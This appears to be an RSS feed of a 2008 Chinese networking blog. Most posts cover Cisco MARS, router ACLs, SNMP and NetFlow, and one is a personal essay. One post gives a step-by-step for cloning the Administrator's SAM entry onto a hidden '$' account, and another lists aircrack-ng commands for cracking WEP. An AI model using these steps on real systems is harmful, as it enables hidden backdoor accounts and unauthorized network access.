http://www.nckz.net/ zh-cn PBlog2 v2.4 http://www.nckz.net/images/logos.gif http://www.nckz.net/ 南财客栈 http://www.nckz.net/article.asp?id=357 masterinn@126.com(admin) Sun,28 Dec 2008 14:19:27 +0800 http://www.nckz.net/default.asp?id=357
    Office Communicator 2007 可以方便地访问丰富的界面、IM和其他实时通信功能，使得信息工作人员可以更方便、更快速地相互通信。与现有通讯簿和公司目录的集成，意味着没有必要仅仅为了实时通信而拥有孤立的联系人列表。用户可以在联系人列表中查找任何人，看他们是否有空，并立即与他们通信。丰富的呈现功能可以让你知道其他联系人是否有空。

    Office Communicator 2007 可以将各种通信模式集成到一种用户体验中。只需一条 IM 即可开始通信，可以添加其他通信模式。如果语音或视频更有效，可以在不打开新窗口或启动另一个程序的情况下，添加这些模式。

    Office Communicator 2007 关注参与会话的人，并提供一致的体验，而不管会话使用的是 IM、语音、视频或其他模式。作为Microsoft Office 系统的组成部分，它与其他 Microsoft Office 程序紧密集成，可以确保通信在程序的使用环境中进行，不必切换到不同程序中使用不同的通信形式。用户可以在 Office Outlook 2007 接收到的电子邮件中，查看其他用户的在线信息，并在电子邮件中启动实时通信，不需要切换应用程序和搜索用户。在 Office Word 2007 中处理文档时，用户可以看到与文档有关的人员的列表，以及这些用户是否有空的信息。用户可以从这个情景列表，并根据这些人员是否有空的信息，开始直接与要找的人员会话。

    Office Communicator 2007最引人注意的部分，就是新添加了强大的VoIP功能，用户可以使用多种Office程序打电话、召开音视频会议
]]> http://www.nckz.net/article.asp?id=356 masterinn@126.com(admin) Wed,24 Dec 2008 17:14:30 +0800 http://www.nckz.net/default.asp?id=356
问：什么是思科安全监控、分析和响应系统？
答：思科安全监控、分析和响应系统（思科安全 MARS）是思科系统公司?提供的一整套基于设备的全面解决方案，它能识别、管理和应对安全威胁。它可利用您原有的网络和安全投资来识别、隔离违规行为并推荐精确的清除措施。

问：有没有其他软件可供选择？
答：没有，思科安全 MARS 是一种硬化和专用的设备，其中包括了 oracle 数据库、操作系统以及用于可扩展、高性能解决方案的所有必要组件，可实现信息安全管理和威胁管理。

问：思科安全 MARS 都监控哪些类型的信息？
答：思科安全 MARS 可集中汇聚来自多种不同的常见网络设备（如路由器和交换机）、安全设备和应用（如防火墙、入侵检测、漏洞扫描器和防病毒应用等）、主机（如 Windows、Solaris 和 LINUX 系统日志）、应用（如数据库、WEB服务器和身份验证服务器）以及网络流量（如 Cisco Netflow）的日志和事件。

问：对每个代理是否另外收费？
答：您对一种设备只支付一个价格。只要该设备还能满足性能要求，您就不必支付任何额外费用。实际上，思科安全 MARS 可以是无代理解决方案。

问：思科安全 MARS 设备的容量是多大？
答：一台设备在 24 小时内能消耗、规范化和全面分析超过 10 亿个事件。

问：我是否需要数据库许可证？
答：目录价格中包括了所有必要组件，其中也包括一份集成 oracle 许可证。

问：如果我有多个思科安全 MARS 设备，有没有推荐的部署架构？
答：全局控制器可为这种情况提供中央控制台。在这种架构中，一台本地控制器将汇总数据转发给全局控制器，后者则可显示您所关心的所有组合“区域”。所有管理访问和控制均可在全局控制器上进行。

问：什么是区域？
答：区域是客户网络（或客户上下文）的一个特定地方。一个或多个本地控制器可以属于一个区域。

问：思科安全 MARS如何支持所支持设备列表中没有的设备？
答：思科安全 MARS 能支持任何可将系统日志 (syslog) 或简单网络管理协议 (SNMP) 流量转发给其控制台的设备。在 LINUX 运行的应用的事件也可被转发给思科安全 MARS，条件是，数据是写到 ASCII 文本文件的，转发是采用思科所提供的代理进行的。

拓扑结构发现

问：采用什么协议来发现网络拓扑结构？
答：思科安全 MARS 采用多种不同的方法来发现网络拓扑结构：

它采用 SNMP 来发现第三层和第二层网络设备。第三层设备必须支持 SNMP MIB II (IETF RFC 1213)，第二层设备则必须支持 SNMP STP MIB (IETF RFC 1493)。所发现的信息包括：接口、第三层路由、第二层生成树、第二层转发表、MAC 地址等等。

它采用 Telnet、安全壳 (SSH) 协议和 Check Point Management Interface (CPMI) 等协议来发现防火墙和防火墙配置。所发现的信息包括：接口、路由、网络地址解析 (NAT) 和访问控制列表 (ACL)。

它可从设备所集成的 Nessus 扫描等多种不同来源了解主机（操作系统、开放端口、应用）。
问：发现设备的最好方法是什么：Telnet/SSH 或 SNMP？
答：SNMP 是快速发现很多设备的最好方法。然而，对采用网络地址解析 (NAT) 或 ACL 信息的路由器，则必须使用 Telnet 或 SSH 。

问：网络拓扑结构信息是如何使用的？
答：思科安全 MARS 以多种不同的方式使用网络拓扑结构：

识别相同连接中的多个不同的事件和流。此类事件可能是由网络设备跨越 NAT 边界而生成的，因此有不同的来源或目的地地址和端口。思科安全 MARS 采用了已申请专利的算法，而这些算法则可利用拓扑结构知识和设备配置信息将这些事件关联到一个连接之中。这可减少事件数据的数量并创建攻击的全部上下文。

减少误报次数。通过识别相同连接的事件，通过分析攻击所采用的从来源到目的地的拓扑结构路径，思科安全 MARS能识别攻击是否实际到达了预期目的地，还是被防火墙或入侵防御设备等中间设备丢弃了。

识别最优抵御点。通过分析从攻击者到预期目的地的路径，思科安全 MARS能将离攻击者最近的设备确定为最优抵御点。设备配置知识还可使思科安全 MARS 能生成与具体设备相关的准确的抵御命令。

识别攻击路径和网络热点。思科安全 MARS 可使用网络拓扑结构知识来实现拓扑结构攻击路径的可视化，并识别那些包含攻击者和被攻击主机的网络区域。

进行更强的论证。鉴于思科安全 MARS 能从设备配置中知道 NAT，它可通过识别 NAT 地址解析和攻击者 MAC 地址而极大增强论证。您可用 NAT 之前或之后的地址来查询系统。
问：如果不用网络拓扑结构，思科安全 MARS 能工作吗？
答：能。思科安全 MARS 可用作基本记录设备，可以收集事件并确定事件之间的关系，但在这种情况下，可能就没有显示网络拓扑结构连通性、显示热点图和进行抵御等功能了。如果将防火墙日志记录水平设置得足够高，则仍能获得 NAT 解析和某些连接数据。

问：思科安全MARS的网络发现背后的原理是什么？
答：第一个和最重要的原理就是迭代的、基于 SNMP 的第三层网络发现。从一个种子第三层设备（称为 SNMP 目标）开始，思科安全 MARS 会发现其第三层邻居，然后重复使用每个邻居作为种子第三层设备来发现其他设备。只需要 SNMP 读访问。

这一过程能发现整个第三层网络，除非有防火墙等设备阻挡对该设备的 SNMP 访问。在这种情况下，思科安全 MARS 就需要使用 Telnet、SSH 或 CPMI 等协议来另外发现 SNMP 阻挡设备。如果针对在这一步骤中所发现的 SNMP 阻挡设备（如基于软件的 Checkpoint 防火墙-1）不能发现路由，则您就需要：

在思科安全 MARS 中手动配置这些路由；或者

在防火墙的另一面提供一个不同的 SNMP 目标，使思科安全 MARS 能在该侧继续进行发现
思科安全 MARS 网络发现引擎可通过组合以下元素来推导出整个拓扑结构：

可以拆分的、有不同 SNMP 目标的、已发现的拓扑结构

通过 Telnet、SSH、CPMI 等所发现的能阻挡 SNMP 的设备
第三层网络发现是自动的，它采用路由中的下一跳地址信息来反复发现其他设备。然而，第二层网络却不是这种情况，所以，您就必须在 CS-MARS 上手动配置第二层设备、其管理接口和访问证书（如 SNMP 公用串）。这一信息也可从以 CiscoWorks 格式编写的种子 .csv 文件中导入。

问：我能不能将思科安全 MARS 配置成只发现我想要的区域？例如，我能不能让它不发现我的 ISP 的网络？
答：能。通过定义有效网络，您就能强迫思科安全 MARS 只发现内部网络。机构一般可选择的有效网络包括专用地址 10.0.0.0/8 和 192.168.0.0/16，以及分配给该机构的公用地址。

问：需要采取哪些精确步骤在思科安全 MARS 中成功进行网络发现？
答：可采取以下步骤：

1. 明确配置那些的确允许 SNMP 访问或拥有 NAT 或 ACL 信息的被监控设备。配置它们的访问证书、访问 IP 地址和访问方法。
2. 配置有效网络和 SNMP 目标组合的集合。如果该有效网络要求新的 SNMP 种子路由器，则您只需指定一个 SNMP 目标。
3. 配置 SNMP 公用串。您可对每个网络分别指定这些参数。如果一台设备属于多个网络，则在发现过程中所有重叠网络的公用串都会被尝试。
4. 在被监控设备列表中明确添加网络入侵检测系统 (IDS) 设备和主机，然后一个一个地发现它们。
5. 在管理 > 有效网络 (Admin > Valid Networks) 中，点击现在就发现 (Discover Now) 可发现手动列表中所包含的所有设备和重复发现的设备。发现过程是并行运行的；在发现进行过程中，您可以执行其他任务。如果您在这一步骤之前点击激活 (Activate)，则思科安全 MARS 就能在 SNMP 发现进行的同时开始接收事件。
问：我如何能确保思科安全 MARS 发现了我的整个网络？我应如何排除故障？
答：可点击管理 > 系统维护 > 查看日志文件 (Admin > System Maintenance > View Log Files)。如果在设备发现过程中没有出现包含字符串“发现因…失败”(Discovery failed for) 的信息，则表示它已发现了您的整个网络。


发现失败的可能原因为：

SNMP 目标设备地址不恰当；要么是它不允许 SNMP 读访问，要么是地址不正确。

有效网络不包括包含相关设备的所有网络。

用于相关网络的 SNMP 公用字符串不正确。

SNMP 被中间的某些防火墙所阻挡。在这种情况下，可将防火墙配置成通过 Telnet、SSH 或 CPMI 而手动发现，并在防火墙的另一侧指定一个不同的 SNMP 目标和有效网络。

手动发现的设备的 Telnet、SSH 或 CPMI 证书不正确。检查此项内容的方法是，通过管理 > 系统设置 (Admin > System Setup) 选项卡选择一个所显示的设备，编辑该设备，然后点击设备发现 (Device Discovery) 网页上的测试连通性 (Test ConnectivITy) 按钮。
问：思科安全 MARS 好象并没有发现我网络中的所有设备。这是为什么？
答：用于发现的配置设置可能不完整。一定要保证您输入了思科安全 MARS 设备所需要的所有 SNMP 公用字符串，一定要保证您所希望发现的所有网络被列为有效网络。

问：我无法向思科安全 MARS 中添加设备，因为点击添加 (Add) 按钮后并未打开新的窗口。这是为什么？
答：可尝试以下这些步骤：

一定要保证您的浏览器中打开了 JAVAScript。

一定要保证您没有运行任何会阻挡弹出式窗口的软件

将汇总页面刷新速率更改为一分钟，以此确保 JAVAScript 正在工作

检查日志文件有无错误。
问：为什么我的某些设备显示为云团？
答：云团表示网络中未被发现的设备，或者在热点图中，您可以告诉思科安全 MARS 将设备显示为设备本身或显示在云团中。通过将设备显示为云团，您就能在图中显示设备，以便能在更高水平上更轻松地读取。

问：思科安全 MARS 是如何不断更新其网络拓扑结构的？
答：您可安排设备重新发现来实现这一目的。这种重新发现可以在网络上安排。

问：思科安全 MARS 需要多长时间能发现一个大型网络？
答：这取决于设备所返回的 SNMP 信息的大小和设备的繁忙程度。发现一个企业级、300-节点的网络，大概需要两小时。然而，在网络被发现的过程中，事件处理可继续进行。用户只需简单地发现被监控设备并激活更改即可。

问：我如何才能知道所有被监控设备都在发送事件呢？
答：点击查询/报告 (QUERY/REPORTS)，然后从下拉式菜单中，选择活动：所有---优先报告设备（正常） [ActivITy: All---  Reporting Devices (Normal)]。点击查询类型 (Query type) 的右侧，然后在按时间过滤 (Filter by Time) 项下，输入最近 10 分钟 (Last 10 minutes)。

多数防火墙都能产生足够多的事件，其中某些事件会显示在该时间区段内。其他设备有时没有任何事件可以发送，所以，查询时间间隔可能需要增大。如果该设备还不能显示出来：

可检查报告 IP 信息。如有错误可更改该信息，然后提交并激活更改。

一定要保证该设备配置成将信息发送给思科安全 MARS。可检查 IP 地址。

以专家模式登录思科安全 MARS 并打开 tcpdump。观察来自具体设备的事件。如果不显示任何事件，则一定要确保该设备被配置成向思科安全 MARS 发送信息。

如果事件还不显示，则可检查思科安全 MARS 上的报告 IP 信息并确保其符合 tcpdump 信息]]> http://www.nckz.net/article.asp?id=354 masterinn@126.com(admin) Tue,23 Dec 2008 10:06:55 +0800 http://www.nckz.net/default.asp?id=354
　　第一是常用的封端口的方法:

　　呵呵，常用的命令如下:

　　1禁止∶

　　access-list 102 deny tcp any any range 6881 6890

　　access-list 102 deny tcp any range 6881 6890 any

　　access-list 102 permit ip any any

　　这种方法有其局限性，一是现在有的bt软件，再封锁后会自动改端口二是我仔细研究过好几个BT下载软件，它们现在的announce端口现在已经用 8000、8080的说，如果连这个也封，那网络使用就有可能不正常(我这样做过，呵呵，后来N多人打电话找我，吓得我马上DEL掉了)

　　第二种方法:就是用NBAR (Network-Based Application Recognition)网络应用识别

　　NBAR是一种动态能在四到七层寻找协议的技术,它不但能做到普通ACL能做到那样控制静态的TCP UDP的报,也能做到控制一般ACLs不能做到动态的端口的那些协议(如BT)之类.

　　An external Packet Description Language Module (PDLM)的文件用来扩展NBAR识别的协议。(具体我也翻译不出来，只看了个大概)，

　　我就说说过程:

　　1到http://www.cisco.com/pcgi-bin/tablebuild.pl/pdlm 下载bittorrent.pdlm，(要CCO的)

　　2放到TFTP，然后用copy tftp disk2(大多数应该是flash)

　　#show runn

　　得到关于BT的部分是

　　class-map match-all bittorrent

　　match protocol bittorrent

　　!

　　!

　　policy-map bittorrent-policy

　　class bittorrent

　　drop

　　!

　　interface GigabitEthernet0/2

　　description CONNECT INSIDE

　　ip address 192.168.168.1 255.255.255.252 secondary

　　ip address 192.168.21.1 255.255.255.0

　　ip nat inside

　　service-policy input bittorrent-policy

　　service-policy output bittorrent-policy

　　duplex full

　　speed 1000

　　media-type rj45

　　no negotiation auto

　　对于EMULE,最新version2.0的包括了emule,可我实验了一下,的确可以

　　ip nbar pdlm bittorrent.pdlm

　　ip nbar pdlm eDonkey.pdlm

　　class-map match-any bittorrent

　　match protocol bittorrent

　　match protocol edonkey

　　!

　　!

　　policy-map bittorrent-policy

　　class bittorrent

　　drop

　　!

　　这样的话,Emule也能K掉了]]> http://www.nckz.net/article.asp?id=353 masterinn@126.com(admin) Thu,18 Dec 2008 21:17:24 +0800 http://www.nckz.net/default.asp?id=353 　　 刚上高一的时候，情窦初开，前座的女生乌黑的头发，迷人的眼睛，那是一双会放电的眼睛。朦朦胧胧有种喜欢的感觉。自己比较内向也不善表达，现在想想那时是又傻又衰，个子不高，长的也不帅。心里想只能偷偷的喜欢了。。。
　　 不过那时唯一的优点学习还算优秀，她时不时会回头问题，我的心里别提多高兴了，讲解起来格外耐心，半个学期过去了情况有些微妙的变化，我发现即使不问题她也会时常回头找些话题聊，记不清从什么时候开始互相传纸条，起初互相也没有表白，但我也能感觉到她也有点喜欢我。
　　 在一个周六的下午，离家近的同学回家了，我们离家远的要么在自习，要么在操场踢球。我俩也都在自习，偷空传两个纸条开开玩笑，传着传着就写到正题上了，当我突然看见传过来的纸条上写着“我喜欢你，我们交朋友吧”，我的心脏的跳动突然加速了一倍，头有点发晕，只感觉到心脏在砰！砰！的跳，是剧烈的跳，心里还有点慌慌的，说不出来是兴奋，还是紧张，那种感觉真是说不清，现在想想这也许就是初恋的感觉吧。
　　 我感觉有点浑身发抖，有一种想跑，想大声喊的感觉。之后跑到操场上踢球，一直跑到晚上，只有舒畅的感觉，没有感觉到累，晚上回到宿舍躺到床上，那一夜失眠了！
　　 初恋是美好的，青春年少也许根本不懂什么是爱情，只是体会到在一起会佷开心，也不去想将来的事情，也许根本算不上爱，只是一种在纯洁的友情上加了一点暧昧。
　　 初恋也是短暂的，持续了不到半个学期也就引起了班主任的注意，也许我在老师的眼中算是好学生那种，这种事情绝对不允许在我的身上发生，在找我很深刻的谈了一次话后，终于让我接受了学生不应该早恋这个事实！（其实心里还是佷不服气的）这是刚刚到高二的事情了，那时刚分文理班，最初她为了和我一个班而选了本不想选的理科班。被老师棒打鸳鸯后，我们也被迫恋恋不舍的分手，她去了文课班。我佷失落，她也很失落，那时感觉自己特弱小，伤心了2年，直到高中毕业。
　　 时间真的可以冲淡一切，何况这弱不禁风的初恋。刚上大学时还有些书信联系，但已经没有继续的念头了，也许成熟了一些，也许现实了一些，人都是在改变。慢慢的联络也少了，最后也就没有了联络。
　　 5年前同学结婚，回老家去参加婚礼，又见面了，她也变了，人更成熟了，也更漂亮了，打招呼，聊了些不疼不痒的话，但是我突然觉得心里有种酸酸的感觉，毕业好多年了突然又觉得初恋的感觉那么的让人怀念。
　　 恋爱还是要继续，结婚也是必须的，这个过程真正体会到了什么爱，但是那种初恋的感觉却再有没有出现过，我知道那种感觉永远也不会再出现了，也许人的一生只能有一次吧。。。。。。。]]> http://www.nckz.net/article.asp?id=352 masterinn@126.com(admin) Thu,20 Nov 2008 10:28:18 +0800 http://www.nckz.net/default.asp?id=352
先建立 dreaminn$ 用户
c:\>net user dreaminn$ 123 /add
//后面加$ 是为了使在 控制台下用 net user 看不到.

然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组,

把"权限"->"完全控制"->"允许"打上勾,然后确定.
这样就可以直接读取本地sam的信息

现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\dreaminn$
查看默认键值为"0x3f1" 相应导出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 为dreaminn$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下

"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00

把其复制后,打开3f1.reg,找到"F"的值,将其删除,然后把上面的那段粘贴.
打开dreaminn$.reg,把里面的内容,比如这个例子中如下面这段复制

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
@=hex(3f1):

回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下
Windows Registry Editor Version 5.00

QUOTE:

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\
fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\
37,f1,02,cf,01,00,01,00,01,00,01,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
@=hex(3f1):

保存后,将cnlnfjhh$用户删除 [在导入数据库之前 一定要先删除这个新加的帐号]c:\>net user dreaminn$ /delete
运行regedit.exe 将我们已经修改好的3f1.reg文件导入.
最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 删除刚才添加的帐号

然后 注销当前用户 用 dreaminn$ / linhai 登陆 就会是 最高权限了.

03克隆的方法和 2000的克隆 略有点区别 就是我文章的那前一部分.

这样就建立了一个在控制台用 net user 和"计算机管理"中都看不到的帐户dreaminn$, 记着第一次就把密码设置好,不要改密码.否则会失效]]> http://www.nckz.net/article.asp?id=351 masterinn@126.com(admin) Tue,04 Nov 2008 15:08:56 +0800 http://www.nckz.net/default.asp?id=351 设置IOS设备
在IOS的Enable状态下，敲入
config terminal 进入全局配置状态
Cdp run 启用CDP
snmp-server community gsunion ro 配置本路由器的只读字串为gsunion
snmp-server community gsunion rw 配置本路由器的读写字串为gsunion
snmp-server enable traps 允许路由器将所有类型SNMP Trap发送出去
snmp-server host IP-address-server traps trapcomm 指定路由器SNMP Trap的接收者为10.238.18.17，发送Trap时采用trapcomm作为字串
snmp-server trap-source loopback0 将loopback接口的IP地址作为SNMP Trap的发送源地址
logging on 起动log机制
logging IP-address-server 将log记录发送到10.238.18.17 (CW2K安装机器的IP地址)上的syslog server
logging facility local7 将记录事件类型定义为local7
logging trap warning 将记录事件严重级别定义为从warningl开始，一直到最紧急级别的事件全部记录到前边指定的syslog server.
logging source-interface loopback0 指定记录事件的发送源地址为loopback0的IP地址
service timestamps log datetime 发送记录事件的时候包含时间标记
enable password ******
line tty 0 4
password ******
login local 设置Enable口令和Telnet口令
show running
copy running start或write terminal 显示并检查配置
保存配置


配置PIX设备
Logging on 在PIX上面启用日志记录
Snmp-server community gsunion 为PIX设备配置共同体串gsunion
Snmp-server enable traps 配置PIX设备将SNMP消息发送到网管服务器
Snmp-server host server-ip 在PIX设备上面配置SNMP网管服务器
Logging history warning

为PIX设备SNMP系统日志消息设置warning级别。
]]> http://www.nckz.net/article.asp?id=350 masterinn@126.com(admin) Thu,30 Oct 2008 11:00:44 +0800 http://www.nckz.net/default.asp?id=350      V9：和V8/5/1不兼容，最大的Feature就是template，具有extensible：但是也因为V9是基于template，需要传输额外的模版数据，默认为20：1，占总流量的4%，Device为了维护Template必须消耗更多的资源
     V8：只能针对aggregate cache：当你再路由器上开启route-based netflow aggregation，就可以使用V8
     V5：只能针对Main cache：（比较常用）：后续增加了BGP AS信息和 流序列号信息
     V1：最先的发行版本，不再使用：
    V2/V3/V4：没有released
     V6：not support
很多国际标准多是基于Netflow的：
（IETF) IP Information Export (IPFIX) Working Group (WG) and the IETF Pack Sampling (PSAMP) WG are based on the NetFlow Version 9 export format.

2：配置Netflow的前提：
    启用路由功能
    开启CEF/DCEF/Fast switch三者选一
    确认Device resource，Netflow需要resume additional resource

3：针对Netflow capture traffic：
==>Ingress Netflow
IP to IP
IP to MPLS
FR terminate
ATM terminate
==>Engress Netflow
IP TO IP
MPLS TO IP（MPLS 倒数第二跳）

4：netflow confirm flow with 7 keywords：
S/D IP ； S/D Port ；3层protocol type ；TOS；ingress interface]]> http://www.nckz.net/article.asp?id=349 masterinn@126.com(admin) Sun,26 Oct 2008 13:17:46 +0800 http://www.nckz.net/default.asp?id=349 　　这个功能检查每一个经过路由器的数据包。在路由器的CEF（Cisco Express Forwarding）表该数据包所到达网络接口的所有路由项中，如果没有该数据包源IP地址的路由，路由器将丢弃该数据包。例如，路由器接收到一个源 IP地址为1.2.3.4的数据包，如果CEF路由表中没有为IP地址1.2.3.4提供任何路由（即反向数据包传输时所需的路由），则路由器会丢弃它。

　　单一地址反向传输路径转发（Unicast Reverse Path Forwarding）在ISP（局端）实现阻止SMURF攻击和其它基于IP地址伪装的攻击。这能够保护网络和客户免受来自互联网其它地方的侵扰。使用 Unicast RPF需要打开路由器的\"CEF swithing\"或\"CEF distributed switching\"选项。不需要将输入接口配置为CEF交换（switching）。只要该路由器打开了CEF功能，所有独立的网络接口都可以配置为其它交换（switching）模式。RPF（反向传输路径转发）属于在一个网络接口或子接口上激活的输入端功能，处理路由器接收的数据包。
在路由器上打开CEF功能是非常重要的，因为RPF必须依靠CEF。Unicast RPF包含在支持CEF的Cisco IOS 12.0及以上版本中，但不支持Cisco IOS 11.2或11.3版本。

　　2、使用访问控制列表（ACL）过滤RFC 1918中列出的所有地址

　　参考以下例子：

　　interface xy
　　ip access-group 101 in
　　access-list 101 deny ip 10.0.0.0 0.255.255.255 any
　　access-list 101 deny ip 192.168.0.0 0.0.255.255 any
　　access-list 101 deny ip 172.16.0.0 0.15.255.255 any
　　access-list 101 permit ip any any

　　3、参照RFC 2267，使用访问控制列表（ACL）过滤进出报文

　　参考以下例子：

　　{ISP中心} -- ISP端边界路由器 -- 客户端边界路由器 -- {客户端网络}

　　ISP端边界路由器应该只接受源地址属于客户端网络的通信，而客户端网络则应该只接受源地址未被客户端网络过滤的通信。以下是ISP端边界路由器的访问控制列表（ACL）例子：

　　access-list 190 permit ip {客户端网络} {客户端网络掩码} any
　　access-list 190 deny ip any any [log]

　　interface {内部网络接口} {网络接口号}
　　ip access-group 190 in

　　以下是客户端边界路由器的ACL例子：

　　access-list 187 deny ip {客户端网络} {客户端网络掩码} any
　　access-list 187 permit ip any any

　　access-list 188 permit ip {客户端网络} {客户端网络掩码} any
　　access-list 188 deny ip any any

　　interface {外部网络接口} {网络接口号}
　　ip access-group 187 in
　　ip access-group 188 out

　　如果打开了CEF功能，通过使用单一地址反向路径转发（Unicast RPF），能够充分地缩短访问控制列表（ACL）的长度以提高路由器性能。为了支持Unicast RPF，只需在路由器完全打开CEF；打开这个功能的网络接口并不需要是CEF交换接口。]]> http://www.nckz.net/article.asp?id=348 masterinn@126.com(admin) Fri,24 Oct 2008 06:04:20 +0800 http://www.nckz.net/default.asp?id=348 MARS 卖哪三处？1。等级保护分析中心  -力助等级保护安全落地！

作用： 将不同等级信息资产的风险集中展现统计，供用户了解其在某个等级下的信息资产安全状况如何。
好处：
1.用户及时掌握自己等级保护制度下各系统的运行情况。
2.让用户对风险分级监测，不是依靠风险高低分级，而是看风险发生在多重要的系统上，重点关注高等级系统当前的风险状况。

2。威胁应急响应中心  - 解决实际运维问题！

传统人工方法：IDS的报警信息拿来，看看帮助文件，去百度搜索一下，搞清原理；然后看看攻击的对象，查查系统配置，扫描两下，定位脆弱点；再然后，把脆弱点和攻击原理匹配，开个会讨论讨论，定出这个报警是否攻击以及如何处置。分析的流程走完了，结论也拿得挺准，但时间却错过了。
作用：一个突发事件可以造成极为巨大的经济损失和无法估量的非经济影响，而提早一秒钟作出处置就可能扭转局面。
好处：MARS  以最短的时间帮用户定位威胁源头，实时取证，并支持应急响应。

3。威胁管理运维中心  -  全程动态威胁定位!

信息系统面临外来威胁大、种类多、手段多变，安全技术进步快，常规的静态风险评估不能适应外界的变化，只有做到动静结合、评估常态化，克服年检式风险评估存在的结构性疏漏。
作用：动态的威胁风险评估中心 从静态被动的监控到动态主动的监控；
好处： MARS是动态评估最合适的硬件工具。


如何正确选MARS？
1。首选 MARS25R，可License 升级到MARS25：适合中小企业市场：
             MARS110R，可License升级到MARS110；适合区域大中型企业总部；电信DCN，金融IDC
2。        MARS55：中型区域企业总部
             MARS210/MARSGC：全国型（分支机构）企业总部；分支放MARS25 ，MARS55，或MARS110；


如何感觉MARS好？

MARS没有License 费用，没有软件升级费用；只有硬件SmartNet或ShareSupport费用！
强烈建议用户购买培训和MARS Tools，费用也不高
]]> http://www.nckz.net/article.asp?id=347 masterinn@126.com(admin) Mon,20 Oct 2008 13:06:48 +0800 http://www.nckz.net/default.asp?id=347
1) modprobe –r iwl3945  (加载Intel 3945无线网卡的模块)

2) modprobe ipwraw

3) ifconfig -a

4) airmon-ng start wifi0 6

5) airodump-ng --ivs -w name -c 6 wifi0

6) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wifi0     （注：-1 is -one）

7) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX wifi0    （注：新的第5步： aireplay-ng  -3  -b ap_mac -h XXXXXXXXXX -x  1024  wifi0）

8) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp

9) aireplay-ng -2 -r mrarp -x 1024 wifi0

0) aircrack-ng -n 64 -b ap_mac name-01.ivs

命令详解

1）ifconfig -a
这个命令用于找到自己的无线网卡的 Mac地址。请记录下来备用。

2) airmon-ng start wlan0 6
这个命令用于将自己的无线网卡置于Monitor 模式，即类似一个AP的效果，因此可以有抓别人包的功能。其中 wlan0 是我电脑里面给无线网卡的，第一个ifconfig -a命令可以看得到。wlan0后面的那个6，是需要破解的AP的频道，如果不知道，可以在事前左下角开始菜单里面，找到 第二项 Internet 下面的倒数第二个画着 无线网的一个工具，用它可以看到那些需要破解的AP的频道（Channel）。

